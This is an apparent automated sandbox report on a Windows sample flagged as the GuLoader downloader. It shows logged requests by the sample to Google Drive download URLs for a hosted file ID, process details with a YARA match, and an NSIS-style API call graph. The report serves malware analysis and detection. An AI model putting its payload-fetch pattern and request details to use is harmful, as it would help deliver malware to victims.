                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.1049990142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:04:03 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:03 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC6lav6-uZMJwRtmv2-xrQ6Wrts5kfLgLVx4Q7gvPpDNTBADWRdzA50TqPz0zbtPY9FEYvezCg4
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:03 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-i-AOsg2TUseIMYgUH_FIdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:04:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 32 4b 6a 59 38 2d 6f 37 6f 48 54 78 67 52 4e 7a 31 38 37 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="82KjY8-o7oHTxgRNz187mA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.1049991142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:04:14 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:14 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:14 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: script-src 'nonce-9mWw9dELkc4XuD84wJt0mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.1049992142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:04:15 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:16 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgTdHiyZGj-LlWeHpQ1ae8TNcUR_QyDTuYfOSndtv-sI9p7jL1lhWb7Q7xwxhxpYrRHH_GLrjEo
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:15 GMT
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: script-src 'nonce-bwxC__Euzb-00dSfBV4RPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:04:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 6a 59 36 65 30 31 6a 4f 43 47 31 7a 31 74 73 37 61 31 56 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qjY6e01jOCG1z1ts7a1VIA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:10:01:08
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                        Imagebase:0x400000
                                                                        File size:887'424 bytes
                                                                        MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:10:02:14
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                        Imagebase:0x400000
                                                                        File size:887'424 bytes
                                                                        MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:19%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:16.5%
                                                                          Total number of Nodes:1511
                                                                          Total number of Limit Nodes:46
                                                                          execution_graph 4830 401d44 4831 402bac 17 API calls 4830->4831 4832 401d52 SetWindowLongA 4831->4832 4833 402a5a 4832->4833 3829 401ec5 3837 402bac 3829->3837 3831 401ecb 3832 402bac 17 API calls 3831->3832 3833 401ed7 3832->3833 3834 401ee3 ShowWindow 3833->3834 3835 401eee EnableWindow 3833->3835 3836 402a5a 3834->3836 3835->3836 3840 40618a 3837->3840 3839 402bc1 3839->3831 3853 406197 3840->3853 3841 4063b9 3842 4063ce 3841->3842 3873 4060f7 lstrcpynA 3841->3873 3842->3839 3844 406393 lstrlenA 3844->3853 3847 40618a 10 API calls 3847->3844 3848 4062af GetSystemDirectoryA 3848->3853 3850 4062c2 GetWindowsDirectoryA 3850->3853 3852 4062f6 SHGetSpecialFolderLocation 3852->3853 3856 40630e SHGetPathFromIDListA CoTaskMemFree 3852->3856 3853->3841 3853->3844 3853->3847 3853->3848 3853->3850 3853->3852 3854 40618a 10 API calls 3853->3854 3855 40633c lstrcatA 3853->3855 3857 405fde 3853->3857 3862 4063d2 3853->3862 3871 406055 wsprintfA 3853->3871 3872 4060f7 lstrcpynA 3853->3872 3854->3853 3855->3853 3856->3853 3874 405f7d 3857->3874 3860 406012 RegQueryValueExA RegCloseKey 3861 406041 3860->3861 3861->3853 3869 4063de 3862->3869 3863 40644a CharPrevA 3865 406446 3863->3865 3864 40643b CharNextA 3864->3865 3864->3869 3865->3863 3866 406465 3865->3866 3866->3853 3868 406429 CharNextA 3868->3869 3869->3864 3869->3865 3869->3868 3870 406436 CharNextA 3869->3870 3878 405aba 3869->3878 3870->3864 3871->3853 3872->3853 3873->3842 3875 405f8c 3874->3875 3876 405f90 3875->3876 3877 405f95 RegOpenKeyExA 3875->3877 3876->3860 3876->3861 3877->3876 3879 405ac0 3878->3879 3880 405ad3 3879->3880 3881 405ac6 CharNextA 3879->3881 3880->3869 3881->3879 3882 401746 3888 402bce 3882->3888 3886 401754 3887 405cbf 2 API calls 3886->3887 3887->3886 3889 402bda 3888->3889 3890 40618a 17 API calls 3889->3890 3891 402bfb 3890->3891 3892 40174d 3891->3892 3893 4063d2 5 API calls 3891->3893 3894 405cbf 3892->3894 3893->3892 3895 405cca GetTickCount GetTempFileNameA 3894->3895 3896 405cfb 3895->3896 3897 405cf7 3895->3897 3896->3886 3897->3895 3897->3896 4834 4045c6 4835 4045d6 4834->4835 4836 4045fc 4834->4836 4841 40417b 4835->4841 4844 4041e2 4836->4844 4839 4045e3 SetDlgItemTextA 4839->4836 4842 40618a 17 API calls 4841->4842 4843 404186 SetDlgItemTextA 4842->4843 4843->4839 4845 4042a5 4844->4845 4846 4041fa GetWindowLongA 4844->4846 4846->4845 4847 40420f 4846->4847 4847->4845 4848 40423c GetSysColor 4847->4848 4849 40423f 4847->4849 4848->4849 4850 404245 SetTextColor 4849->4850 4851 40424f SetBkMode 4849->4851 4850->4851 4852 404267 GetSysColor 4851->4852 4853 40426d 4851->4853 4852->4853 4854 404274 SetBkColor 4853->4854 4855 40427e 4853->4855 4854->4855 4855->4845 4856 404291 DeleteObject 4855->4856 4857 404298 CreateBrushIndirect 4855->4857 4856->4857 4857->4845 4858 401947 4859 402bce 17 API calls 4858->4859 4860 40194e lstrlenA 4859->4860 4861 402620 4860->4861 3898 403348 SetErrorMode GetVersion 3899 403389 3898->3899 3900 40338f 3898->3900 3901 406500 5 API calls 3899->3901 3988 406492 GetSystemDirectoryA 3900->3988 3901->3900 3903 4033a5 lstrlenA 3903->3900 3904 4033b4 3903->3904 3991 406500 GetModuleHandleA 3904->3991 3907 406500 5 API calls 3908 4033c2 3907->3908 3909 406500 5 API calls 3908->3909 3910 4033ce #17 OleInitialize SHGetFileInfoA 3909->3910 3997 4060f7 lstrcpynA 3910->3997 3913 40341a GetCommandLineA 3998 4060f7 lstrcpynA 3913->3998 3915 40342c 3916 405aba CharNextA 3915->3916 3917 403455 CharNextA 3916->3917 3925 403465 3917->3925 3918 40352f 3919 403542 GetTempPathA 3918->3919 3999 403317 3919->3999 3921 40355a 3923 4035b4 DeleteFileA 3921->3923 3924 40355e GetWindowsDirectoryA lstrcatA 3921->3924 3922 405aba CharNextA 3922->3925 4009 402ea1 GetTickCount GetModuleFileNameA 3923->4009 3926 403317 12 API calls 3924->3926 3925->3918 3925->3922 3929 403531 3925->3929 3928 40357a 3926->3928 3928->3923 3931 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3928->3931 4094 4060f7 lstrcpynA 3929->4094 3930 4035c8 3932 40365e 3930->3932 3935 40364e 3930->3935 3939 405aba CharNextA 3930->3939 3934 403317 12 API calls 3931->3934 4111 403830 3932->4111 3937 4035ac 3934->3937 4037 40390a 3935->4037 3937->3923 3937->3932 3941 4035e3 3939->3941 3947 403629 3941->3947 3948 40368e 3941->3948 3942 403796 3944 403818 ExitProcess 3942->3944 3945 40379e GetCurrentProcess OpenProcessToken 3942->3945 3943 403678 4118 405813 3943->4118 3950 4037e9 3945->3950 3951 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3945->3951 4095 405b7d 3947->4095 4122 40577e 3948->4122 3955 406500 5 API calls 3950->3955 3951->3950 3958 4037f0 3955->3958 3961 403805 ExitWindowsEx 3958->3961 3964 403811 3958->3964 3959 4036a4 lstrcatA 3960 4036af lstrcatA lstrcmpiA 3959->3960 3960->3932 3963 4036cb 3960->3963 3961->3944 3961->3964 3966 4036d0 3963->3966 3967 4036d7 3963->3967 4142 40140b 3964->4142 3965 403643 4110 4060f7 lstrcpynA 3965->4110 4125 4056e4 CreateDirectoryA 3966->4125 4130 405761 CreateDirectoryA 3967->4130 3973 4036dc SetCurrentDirectoryA 3974 4036f6 3973->3974 3975 4036eb 3973->3975 4134 4060f7 lstrcpynA 3974->4134 4133 4060f7 lstrcpynA 3975->4133 3978 40618a 17 API calls 3979 403735 DeleteFileA 3978->3979 3980 403742 CopyFileA 3979->3980 3981 403704 3979->3981 3980->3981 3981->3978 3982 40378a 3981->3982 3985 40618a 17 API calls 3981->3985 3987 403776 CloseHandle 3981->3987 4135 405ed6 MoveFileExA 3981->4135 4139 405796 CreateProcessA 3981->4139 3983 405ed6 36 API calls 3982->3983 3983->3932 3985->3981 3987->3981 3989 4064b4 wsprintfA LoadLibraryExA 3988->3989 3989->3903 3992 406526 GetProcAddress 3991->3992 3993 40651c 3991->3993 3994 4033bb 3992->3994 3995 406492 3 API calls 3993->3995 3994->3907 3996 406522 3995->3996 3996->3992 3996->3994 3997->3913 3998->3915 4000 4063d2 5 API calls 3999->4000 4002 403323 4000->4002 4001 40332d 4001->3921 4002->4001 4145 405a8f lstrlenA CharPrevA 4002->4145 4005 405761 2 API calls 4006 40333b 4005->4006 4007 405cbf 2 API calls 4006->4007 4008 403346 4007->4008 4008->3921 4148 405c90 GetFileAttributesA CreateFileA 4009->4148 4011 402ee1 4012 402ef1 4011->4012 4149 4060f7 lstrcpynA 4011->4149 4012->3930 4014 402f07 4150 405ad6 lstrlenA 4014->4150 4018 402f18 GetFileSize 4033 403012 4018->4033 4036 402f2f 4018->4036 4020 40301b 4020->4012 4022 40304b GlobalAlloc 4020->4022 4190 403300 SetFilePointer 4020->4190 4166 403300 SetFilePointer 4022->4166 4023 40307e 4027 402e3d 6 API calls 4023->4027 4026 403066 4167 4030d8 4026->4167 4027->4012 4028 403034 4030 4032ea ReadFile 4028->4030 4032 40303f 4030->4032 4031 402e3d 6 API calls 4031->4036 4032->4012 4032->4022 4155 402e3d 4033->4155 4034 403072 4034->4012 4034->4034 4035 4030af SetFilePointer 4034->4035 4035->4012 4036->4012 4036->4023 4036->4031 4036->4033 4187 4032ea 4036->4187 4038 406500 5 API calls 4037->4038 4039 40391e 4038->4039 4040 403924 4039->4040 4041 403936 4039->4041 4219 406055 wsprintfA 4040->4219 4042 405fde 3 API calls 4041->4042 4043 403961 4042->4043 4045 40397f lstrcatA 4043->4045 4047 405fde 3 API calls 4043->4047 4046 403934 4045->4046 4211 403bcf 4046->4211 4047->4045 4050 405b7d 18 API calls 4051 4039b1 4050->4051 4052 403a3a 4051->4052 4054 405fde 3 API calls 4051->4054 4053 405b7d 18 API calls 4052->4053 4056 403a40 4053->4056 4057 4039dd 4054->4057 4055 403a50 LoadImageA 4059 403af6 4055->4059 4060 403a77 RegisterClassA 4055->4060 4056->4055 4058 40618a 17 API calls 4056->4058 4057->4052 4061 4039f9 lstrlenA 4057->4061 4064 405aba CharNextA 4057->4064 4058->4055 4063 40140b 2 API calls 4059->4063 4062 403aad SystemParametersInfoA CreateWindowExA 4060->4062 4092 403b00 4060->4092 4065 403a07 lstrcmpiA 4061->4065 4066 403a2d 4061->4066 4062->4059 4067 403afc 4063->4067 4069 4039f7 4064->4069 4065->4066 4070 403a17 GetFileAttributesA 4065->4070 4068 405a8f 3 API calls 4066->4068 4071 403bcf 18 API calls 4067->4071 4067->4092 4072 403a33 4068->4072 4069->4061 4073 403a23 4070->4073 4074 403b0d 4071->4074 4220 4060f7 lstrcpynA 4072->4220 4073->4066 4076 405ad6 2 API calls 4073->4076 4077 403b19 ShowWindow 4074->4077 4078 403b9c 4074->4078 4076->4066 4080 406492 3 API calls 4077->4080 4221 4052f0 OleInitialize 4078->4221 4082 403b31 4080->4082 4081 403ba2 4083 403ba6 4081->4083 4084 403bbe 4081->4084 4085 403b3f GetClassInfoA 4082->4085 4087 406492 3 API calls 4082->4087 4090 40140b 2 API calls 4083->4090 4083->4092 4086 40140b 2 API calls 4084->4086 4088 403b53 GetClassInfoA RegisterClassA 4085->4088 4089 403b69 DialogBoxParamA 4085->4089 4086->4092 4087->4085 4088->4089 4091 40140b 2 API calls 4089->4091 4090->4092 4093 403b91 4091->4093 4092->3932 4093->4092 4094->3919 4239 4060f7 lstrcpynA 4095->4239 4097 405b8e 4240 405b28 CharNextA CharNextA 4097->4240 4100 403634 4100->3932 4109 4060f7 lstrcpynA 4100->4109 4101 4063d2 5 API calls 4104 405ba4 4101->4104 4102 405bcf lstrlenA 4103 405bda 4102->4103 4102->4104 4106 405a8f 3 API calls 4103->4106 4104->4100 4104->4102 4108 405ad6 2 API calls 4104->4108 4246 40646b FindFirstFileA 4104->4246 4107 405bdf GetFileAttributesA 4106->4107 4107->4100 4108->4102 4109->3965 4110->3935 4112 403848 4111->4112 4113 40383a CloseHandle 4111->4113 4249 403875 4112->4249 4113->4112 4119 405828 4118->4119 4120 403686 ExitProcess 4119->4120 4121 40583c MessageBoxIndirectA 4119->4121 4121->4120 4123 406500 5 API calls 4122->4123 4124 403693 lstrcatA 4123->4124 4124->3959 4124->3960 4126 4036d5 4125->4126 4127 405735 GetLastError 4125->4127 4126->3973 4127->4126 4128 405744 SetFileSecurityA 4127->4128 4128->4126 4129 40575a GetLastError 4128->4129 4129->4126 4131 405771 4130->4131 4132 405775 GetLastError 4130->4132 4131->3973 4132->4131 4133->3974 4134->3981 4136 405eea 4135->4136 4138 405ef7 4135->4138 4306 405d66 4136->4306 4138->3981 4140 4057d5 4139->4140 4141 4057c9 CloseHandle 4139->4141 4140->3981 4141->4140 4143 401389 2 API calls 4142->4143 4144 401420 4143->4144 4144->3944 4146 403335 4145->4146 4147 405aa9 lstrcatA 4145->4147 4146->4005 4147->4146 4148->4011 4149->4014 4151 405ae3 4150->4151 4152 402f0d 4151->4152 4153 405ae8 CharPrevA 4151->4153 4154 4060f7 lstrcpynA 4152->4154 4153->4151 4153->4152 4154->4018 4156 402e46 4155->4156 4157 402e5e 4155->4157 4158 402e56 4156->4158 4159 402e4f DestroyWindow 4156->4159 4160 402e66 4157->4160 4161 402e6e GetTickCount 4157->4161 4158->4020 4159->4158 4191 40653c 4160->4191 4163 402e7c CreateDialogParamA ShowWindow 4161->4163 4164 402e9f 4161->4164 4163->4164 4164->4020 4166->4026 4168 4030ee 4167->4168 4169 40311c 4168->4169 4197 403300 SetFilePointer 4168->4197 4171 4032ea ReadFile 4169->4171 4172 403127 4171->4172 4173 403283 4172->4173 4174 403139 GetTickCount 4172->4174 4176 40326d 4172->4176 4175 4032c5 4173->4175 4180 403287 4173->4180 4174->4176 4183 403188 4174->4183 4178 4032ea ReadFile 4175->4178 4176->4034 4177 4032ea ReadFile 4177->4183 4178->4176 4179 4032ea ReadFile 4179->4180 4180->4176 4180->4179 4181 405d37 WriteFile 4180->4181 4181->4180 4182 4031de GetTickCount 4182->4183 4183->4176 4183->4177 4183->4182 4184 403203 MulDiv wsprintfA 4183->4184 4195 405d37 WriteFile 4183->4195 4198 40521e 4184->4198 4209 405d08 ReadFile 4187->4209 4190->4028 4192 406559 PeekMessageA 4191->4192 4193 402e6c 4192->4193 4194 40654f DispatchMessageA 4192->4194 4193->4020 4194->4192 4196 405d55 4195->4196 4196->4183 4197->4169 4199 405239 4198->4199 4208 4052dc 4198->4208 4200 405256 lstrlenA 4199->4200 4201 40618a 17 API calls 4199->4201 4202 405264 lstrlenA 4200->4202 4203 40527f 4200->4203 4201->4200 4204 405276 lstrcatA 4202->4204 4202->4208 4205 405292 4203->4205 4206 405285 SetWindowTextA 4203->4206 4204->4203 4207 405298 SendMessageA SendMessageA SendMessageA 4205->4207 4205->4208 4206->4205 4207->4208 4208->4183 4210 4032fd 4209->4210 4210->4036 4212 403be3 4211->4212 4228 406055 wsprintfA 4212->4228 4214 403c54 4229 403c88 4214->4229 4216 40398f 4216->4050 4217 403c59 4217->4216 4218 40618a 17 API calls 4217->4218 4218->4217 4219->4046 4220->4052 4232 4041c7 4221->4232 4223 405313 4227 40533a 4223->4227 4235 401389 4223->4235 4224 4041c7 SendMessageA 4225 40534c OleUninitialize 4224->4225 4225->4081 4227->4224 4228->4214 4230 40618a 17 API calls 4229->4230 4231 403c96 SetWindowTextA 4230->4231 4231->4217 4233 4041d0 SendMessageA 4232->4233 4234 4041df 4232->4234 4233->4234 4234->4223 4237 401390 4235->4237 4236 4013fe 4236->4223 4237->4236 4238 4013cb MulDiv SendMessageA 4237->4238 4238->4237 4239->4097 4241 405b43 4240->4241 4244 405b53 4240->4244 4243 405b4e CharNextA 4241->4243 4241->4244 4242 405b73 4242->4100 4242->4101 4243->4242 4244->4242 4245 405aba CharNextA 4244->4245 4245->4244 4247 406481 FindClose 4246->4247 4248 40648c 4246->4248 4247->4248 4248->4104 4250 403883 4249->4250 4251 403888 FreeLibrary GlobalFree 4250->4251 4252 40384d 4250->4252 4251->4251 4251->4252 4253 4058bf 4252->4253 4254 405b7d 18 API calls 4253->4254 4255 4058df 4254->4255 4256 4058e7 DeleteFileA 4255->4256 4257 4058fe 4255->4257 4258 403667 